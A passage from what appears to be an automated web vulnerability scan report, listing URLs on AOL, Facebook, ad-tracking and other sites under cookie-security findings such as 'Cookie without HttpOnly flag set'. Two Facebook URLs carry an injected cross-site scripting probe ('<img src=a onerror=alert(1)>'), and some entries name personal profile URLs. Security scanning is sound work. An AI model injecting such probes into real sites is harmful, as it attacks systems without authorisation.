16.133. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45570401758886

16.134. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45670967234764

16.135. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45689243038650

16.136. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45696645958814

16.137. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46401418154127

16.138. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46547738644294

16.139. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46606079612392

16.140. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46721464460715

16.141. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46752376970835

16.142. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4694483816623

16.143. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47134800327476

16.144. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47243939966429

16.145. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47805332352872

16.146. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47930286049377

16.147. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48242398074362

16.148. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4827615687157

16.149. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48352218910586

16.150. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48578549234662

16.151. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48622659663669

16.152. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48943998781032

16.153. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49281189679168

16.154. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49337460868991

16.155. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49353421742562

16.156. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49393149293027

16.157. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49413108131848

16.158. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49435746781527

16.159. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49873315552249

16.160. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49904012384358

16.161. http://sportingnews.us.intellitxt.com/intellitxt/front.asp

16.162. http://tacoda.at.atwola.com/rtx/r.js

16.163. http://tags.bluekai.com/site/3200

16.164. http://tags.bluekai.com/site/450

16.165. https://us.etrade.com/e/t/welcome/whychooseetrade

16.166. http://video.google.com/

16.167. http://view.c3metrics.com/c3VTabstrct-6-2.php

16.168. http://www.facebook.com/

16.169. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

16.170. http://www.facebook.com/10000082482078341583

16.171. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

16.172. http://www.facebook.com/1242845259

16.173. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

16.174. http://www.facebook.com/2008/fbml

16.175. http://www.facebook.com/AOLrealestate

16.176. http://www.facebook.com/BPAmerica

16.177. http://www.facebook.com/DailyFinance

16.178. http://www.facebook.com/HockeyKen

16.179. http://www.facebook.com/KickIceForever

16.180. http://www.facebook.com/LadyBonesie

16.181. http://www.facebook.com/Loizza

16.182. http://www.facebook.com/aim

16.183. http://www.facebook.com/ajax/intl/language_dialog.php

16.184. http://www.facebook.com/ajax/reg_birthday_help.php

16.185. http://www.facebook.com/ajax/register/logging.php

16.186. http://www.facebook.com/aol

16.187. http://www.facebook.com/aolradio

16.188. http://www.facebook.com/badges

16.189. http://www.facebook.com/burkerkink

16.190. http://www.facebook.com/campaign/landing.php

16.191. http://www.facebook.com/careers/

16.192. http://www.facebook.com/deedee.perez1

16.193. http://www.facebook.com/directory/pages/

16.194. http://www.facebook.com/directory/people/

16.195. http://www.facebook.com/facebook

16.196. http://www.facebook.com/fayse

16.197. http://www.facebook.com/find-friends

16.198. http://www.facebook.com/find-friends

16.199. http://www.facebook.com/gale.l.schenk

16.200. http://www.facebook.com/help/

16.201. http://www.facebook.com/help/

16.202. http://www.facebook.com/home.php

16.203. http://www.facebook.com/izaOllie

16.204. http://www.facebook.com/jezzas

16.205. http://www.facebook.com/kimberly.christ

16.206. http://www.facebook.com/ladonna.lokey

16.207. http://www.facebook.com/lakendra.roberts

16.208. http://www.facebook.com/login.php

16.209. http://www.facebook.com/login.php

16.210. http://www.facebook.com/mapquest

16.211. http://www.facebook.com/matthew.oliveira2

16.212. http://www.facebook.com/mmafighting

16.213. http://www.facebook.com/mobile

16.214. http://www.facebook.com/mobile/

16.215. http://www.facebook.com/mobile/

16.216. http://www.facebook.com/pages/Barnesville/115038011847083

16.217. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

16.218. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

16.219. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

16.220. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

16.221. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

16.222. http://www.facebook.com/pages/HMFIC/149403761740008

16.223. http://www.facebook.com/pages/HuffPost-World/70242384902

16.224. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

16.225. http://www.facebook.com/pages/Merchandiser/123981654314779

16.226. http://www.facebook.com/pages/New-Haven-College/130105783687523

16.227. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

16.228. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

16.229. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

16.230. http://www.facebook.com/pages/Sporting-News/104068362964496

16.231. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

16.232. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

16.233. http://www.facebook.com/pages/create.php

16.234. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

16.235. http://www.facebook.com/patroyo

16.236. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

16.237. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

16.238. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

16.239. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

16.240. http://www.facebook.com/people/Bucky-Jordan/100000824820783

16.241. http://www.facebook.com/policy.php

16.242. http://www.facebook.com/privacy/explanation.php

16.243. http://www.facebook.com/profile.php

16.244. http://www.facebook.com/r.php

16.245. http://www.facebook.com/recover.php

16.246. http://www.facebook.com/robynalys

16.247. http://www.facebook.com/share.php

16.248. http://www.facebook.com/sharer.php

16.249. http://www.facebook.com/skdarealist

16.250. http://www.facebook.com/sportingnews

16.251. http://www.facebook.com/stefanoboscolomarchi

16.252. http://www.facebook.com/techcrunch

16.253. http://www.facebook.com/terms.php

16.254. http://www.facebook.com/theteebers

16.255. http://www.facebook.com/wmoppert

16.256. https://www.facebook.com/

16.257. https://www.facebook.com/ajax/intl/language_dialog.php

16.258. https://www.facebook.com/h02332

16.259. https://www.facebook.com/h02332

16.260. https://www.facebook.com/h02332

16.261. https://www.facebook.com/help/contact.php

16.262. https://www.facebook.com/login.php

16.263. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

16.264. https://www.facebook.com/pages/create.php

16.265. https://www.facebook.com/r.php

16.266. https://www.facebook.com/recover.php

16.267. https://www.godaddy.com/

16.268. https://www.godaddy.com/domains/search.aspx

16.269. https://www.godaddy.com/gdshop/hosting/landing.asp

16.270. https://www.godaddy.com/gdshop/registrar/search.asp

16.271. https://www.godaddy.com/gdshop/website.asp

16.272. http://www.google.com/finance

16.273. http://www.huffingtonpost.com/users/logout/

16.274. http://www.marketwatch.com/News/Story/Story.aspx

16.275. http://www.moviefone.com/

16.276. http://www.truveo.com/

16.277. http://www.truveo.com/search

17. Cookie without HttpOnly flag set

17.1. http://alerts.aol.com/ar/dlink/dlink.rr

17.2. http://aolmobile.aol.com/registration/welcome

17.3. http://aolproductcentral.aol.com/ClickBroker

17.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

17.5. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

17.6. https://aolproductcentral.aol.com/ClickBroker

17.7. http://api.screenname.aol.com/auth/getToken

17.8. http://api.screenname.aol.com/auth/login

17.9. https://api.screenname.aol.com/auth/getInfo

17.10. https://api.screenname.aol.com/auth/getToken

17.11. https://api.screenname.aol.com/auth/login

17.12. https://api.screenname.aol.com/auth/logout

17.13. http://daol.aol.com/software/

17.14. http://daol.aol.com/software/computer-checkup-premium/

17.15. http://daol.aol.com/software/livemocha

17.16. http://dev.aol.com/

17.17. http://ecommerce.randomhouse.com/

17.18. http://gasprices.mapquest.com/

17.19. http://help.aol.com/help/microsites/article_index.jsp

17.20. http://help.aol.com/help/microsites/microsite.do

17.21. http://help.aol.com/help/microsites/search.do

17.22. http://help.aol.com/help/teams/help_team/

17.23. http://help.channels.aol.com/topic.adp

17.24. http://history.nhl.com/

17.25. http://lifestream.aol.com/

17.26. http://lifestream.aol.com/search

17.27. https://new.aol.com/productsweb

17.28. https://new.aol.com/productsweb/

17.29. http://realestate.aol.com/modules/common2/main_mortrate_data.jsp

17.30. http://search.twitter.com/se

17.31. http://services.crunchboard.com/settings.php

17.32. http://shortcuts.com/

17.33. http://surveys.aol.com/survey/sparticle&rid=T&pname=42282

17.34. http://t.mookie1.com/t/v1/imp

17.35. http://television.aol.com/

17.36. https://us.etrade.com/e/t/welcome/whychooseetrade

17.37. http://weather.aol.com/

17.38. http://www.aol.com/

17.39. http://www.aol.com/ajax.jsp

17.40. http://www.crunchboard.com/opening/detailjob.php

17.41. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

17.42. https://www.fightmagazine.com/mma-magazine/subscribe.asp

17.43. https://www.godaddy.com/gdshop/catalog.asp

17.44. https://www.godaddy.com/gdshop/hosting/landing.asp

17.45. https://www.godaddy.com/gdshop/registrar/search.asp

17.46. https://www.godaddy.com/gdshop/website.asp

17.47. http://www.mapquest.com/

17.48. http://www.mapquest.com/_svc/ad/getads

17.49. http://www.mapquest.com/_svc/apixel

17.50. http://www.mapquest.com/_svc/publishing/promo

17.51. http://www.mapquest.com/_svc/searchio

17.52. http://www.mapquest.com/cdn/_uac/adpage.htm

17.53. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

17.54. http://www.mapquest.com/icons/stop.png

17.55. http://www.mmawarehouse.com/

17.56. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

17.57. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

17.58. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

17.59. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

17.60. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

17.61. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

17.62. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

17.63. http://www.truveo.com/

17.64. http://www.truveo.com/search

17.65. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

17.66. http://yellowpages.aol.com/

17.67. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

17.68. http://abcnews.go.com/Entertainment/popup

17.69. https://account.login.aol.com/_cqr/opr/opr.psp

17.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

17.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1543.1127.tk.TEXT/557102793

17.72. http://ad.yieldmanager.com/pixel

17.73. http://ad.yieldmanager.com/unpixel

17.74. http://add.my.yahoo.com/content

17.75. http://ads.pointroll.com/PortalServe/

17.76. http://ads.undertone.com/afr.php

17.77. http://ads.undertone.com/fc.php

17.78. http://ads.undertone.com/l

17.79. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2

17.80. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

17.81. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6

17.82. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

17.83. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

17.84. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13

17.85. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14

17.86. http://aol.worldwinner.com/cgi/welcome/21sie

17.87. http://aolmobile.aol.com/registration/changeSettings

17.88. http://aolmobile.aol.com/registration/deleteDevice

17.89. http://aolmobile.aol.com/registration/generateConfCode

17.90. http://aolmobile.aol.com/registration/validateConfirmCode

17.91. http://apartments.rentedspaces.oodle.com/

17.92. http://api.twitter.com/1/statuses/show.json

17.93. http://api.twitter.com/1/statuses/user_timeline.json

17.94. http://apps.conduit.com/

17.95. http://apps.conduit.com/TechCrunch_App-Techcrunch_News

17.96. http://ar-ar.facebook.com/login.php

17.97. http://ar.atwola.com/atd

17.98. http://ar.voicefive.com/b/wc_beacon.pli

17.99. http://ar.voicefive.com/bmx3/broker.pli

17.100. http://ar.voicefive.com/bmx3/broker.pli

17.101. http://b.aol.com/master/

17.102. http://b.aol.com/vanity/

17.103. http://b.dailyfinance.com/vanity/

17.104. http://b.huffingtonpost.com/vanity/

17.105. http://b.mmafighting.com/vanity/

17.106. http://b.scorecardresearch.com/b

17.107. http://b.scorecardresearch.com/p

17.108. http://b.scorecardresearch.com/r

17.109. http://b.voicefive.com/b

17.110. http://bid.openx.net/json

17.111. https://bill.aol.com/SPortal/jsp/main.jsp

17.112. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp

17.113. http://blogsearch.google.com/

17.114. http://books.google.com/bkshp

17.115. http://books.google.com/books

17.116. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.117. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.118. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

17.119. http://citi.bridgetrack.com/event/

17.120. http://clk.atdmt.com/CNT/go/319709115/direct

17.121. http://clk.atdmt.com/M0N/go/314366790/direct

17.122. http://clk.atdmt.com/NYC/go/310177527/direct

17.123. http://clk.atdmt.com/go/253735206/direct

17.124. http://clk.atdmt.com/go/253735225/direct

17.125. http://clk.atdmt.com/go/253735228/direct

17.126. http://clk.atdmt.com/go/310177527/direct

17.127. http://clk.atdmt.com/go/314366790/direct

17.128. http://clk.atdmt.com/go/319709115/direct

17.129. http://d.tradex.openx.com/afr.php

17.130. http://d.tradex.openx.com/ck.php

17.131. http://d1.openx.org/ck.php

17.132. http://d1.openx.org/spc.php

17.133. http://d1.openx.org/spc.php

17.134. http://d1.openx.org/spcjs.php

17.135. http://developers.facebook.com/

17.136. http://developers.facebook.com/plugins/

17.137. http://digg.com/submit

17.138. http://eatps.web.aol.com:9000/open_web_adhoc

17.139. http://fls.doubleclick.net/activityi

17.140. http://fusion.google.com/add

17.141. http://googleads.g.doubleclick.net/aclk

17.142. http://groups.google.com/grphp

17.143. http://idcs.interclick.com/Segment.aspx

17.144. http://image3.pubmatic.com/AdServer/UPug

17.145. http://images.apple.com/global/nav/styles/navigation.css

17.146. http://leadback.advertising.com/adcedge/lb

17.147. http://mail.aol.com/

17.148. https://maps-api-ssl.google.com/maps

17.149. http://maps.google.com/maps

17.150. http://metricstream.mkt25.com/wa/tiwa.php

17.151. http://mobile.aol.com/

17.152. http://mobile.aol.com/product/Android/dailyfinance/

17.153. http://mobile.aol.com/product/iPhone/Autos/

17.154. http://mobile.aol.com/product/iPhone/aim/

17.155. http://mobile.aol.com/product/iPhone/aol-radio/

17.156. http://mobile.aol.com/product/iPhone/daily-finance/

17.157. http://mobile.aol.com/product/iPhone/engadget/

17.158. http://mobile.aol.com/product/iPhone/iPad/

17.159. http://mobile.aol.com/product/iPhone/mail/

17.160. http://mobile.aol.com/product/iPhone/search/

17.161. http://mobile.aol.com/supported-carriers/

17.162. http://music.aol.com/radioguide/bb

17.163. http://my.screenname.aol.com/_cqr/login/checkStatus.psp

17.164. http://my.screenname.aol.com/_cqr/login/checkStatus.psp

17.165. http://my.screenname.aol.com/_cqr/logout/mcLogout.psp

17.166. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

17.167. https://my.screenname.aol.com/_cqr/login/jslogin.psp

17.168. https://my.screenname.aol.com/_cqr/login/login.psp

17.169. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

17.170. https://my.screenname.aol.com/badbrowser.psp

17.171. http://pixel.quantserve.com/pixel

17.172. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

17.173. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

17.174. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

17.175. http://privacy.aol.com/

17.176. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

17.177. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

17.178. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

17.179. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

17.180. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

17.181. http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

17.182. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

17.183. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

17.184. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

17.185. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

17.186. http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

17.187. http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

17.188. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

17.189. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

17.190. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

17.191. http://realestate.aol.com/

17.192. http://realestate.aol.com/blog/rental-listings

17.193. http://scholar.google.com/schhp

17.194. http://search.aol.com/aol/about

17.195. http://search.aol.com/aol/advanced

17.196. http://search.aol.com/aol/advanced_image

17.197. http://search.aol.com/aol/imageDetails

17.198. http://search.aol.com/aol/imagehome

17.199. http://search.aol.com/aol/newshome

17.200. http://search.aol.com/aol/search

17.201. http://search.aol.com/aol/settings

17.202. http://search.aol.com/aol/tracking

17.203. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

17.204. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

17.205. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713

17.206. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043

17.207. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550

17.208. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095

17.209. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661

17.210. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007

17.211. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465

17.212. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912

17.213. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119

17.214. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650

17.215. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880

17.216. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519

17.217. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624

17.218. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976

17.219. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770

17.220. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648

17.221. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547

17.222. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256

17.223. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970

17.224. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439

17.225. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179

17.226. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412

17.227. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869

17.228. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221

17.229. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715

17.230. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45238099694252

17.231. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45327582890167

17.232. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45334947153460

17.233. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45375636194366

17.234. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45471094280947

17.235. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45570401758886

17.236. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45670967234764

17.237. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45689243038650

17.238. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45696645958814

17.239. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46401418154127

17.240. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46547738644294

17.241. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46606079612392

17.242. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46721464460715

17.243. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46752376970835

17.244. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4694483816623

17.245. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47134800327476

17.246. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47243939966429

17.247. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47805332352872

17.248. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47930286049377

17.249. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48242398074362

17.250. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4827615687157

17.251. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48352218910586

17.252. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48578549234662

17.253. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48622659663669

17.254. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48943998781032

17.255. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49281189679168

17.256. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49337460868991

17.257. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49353421742562

17.258. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49393149293027

17.259. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49413108131848

17.260. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49435746781527

17.261. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49873315552249

17.262. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49904012384358

17.263. http://sportingnews.us.intellitxt.com/intellitxt/front.asp

17.264. http://tacoda.at.atwola.com/rtx/r.js

17.265. http://tags.bluekai.com/site/3200

17.266. http://tags.bluekai.com/site/450

17.267. http://top-sec.net/vb/

17.268. http://top-sec.net/vb/calendar.php

17.269. http://top-sec.net/vb/external.php

17.270. http://top-sec.net/vb/faq.php

17.271. http://top-sec.net/vb/forumdisplay.php

17.272. http://top-sec.net/vb/index.php

17.273. http://top-sec.net/vb/login.php

17.274. http://top-sec.net/vb/member.php

17.275. http://top-sec.net/vb/memberlist.php

17.276. http://top-sec.net/vb/online.php

17.277. http://top-sec.net/vb/post_thanks.php

17.278. http://top-sec.net/vb/profile.php

17.279. http://top-sec.net/vb/register.php

17.280. http://top-sec.net/vb/search.php

17.281. http://top-sec.net/vb/showgroups.php

17.282. http://top-sec.net/vb/showthread.php

17.283. http://top-sec.net/vb/tags.php

17.284. http://translate.googleapis.com/translate_a/t

17.285. http://twitter.com/account/bootstrap_data

17.286. http://twitter.com/home

17.287. http://twitter.com/search

17.288. http://twitter.com/share

17.289. http://video.google.com/

17.290. http://view.c3metrics.com/c3VTabstrct-6-2.php

17.291. http://webmail.aol.com/

17.292. http://www.citysbest.com/

17.293. http://www.dailyfinance.com/

17.294. http://www.dailyfinance.com/

17.295. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

17.296. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

17.297. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

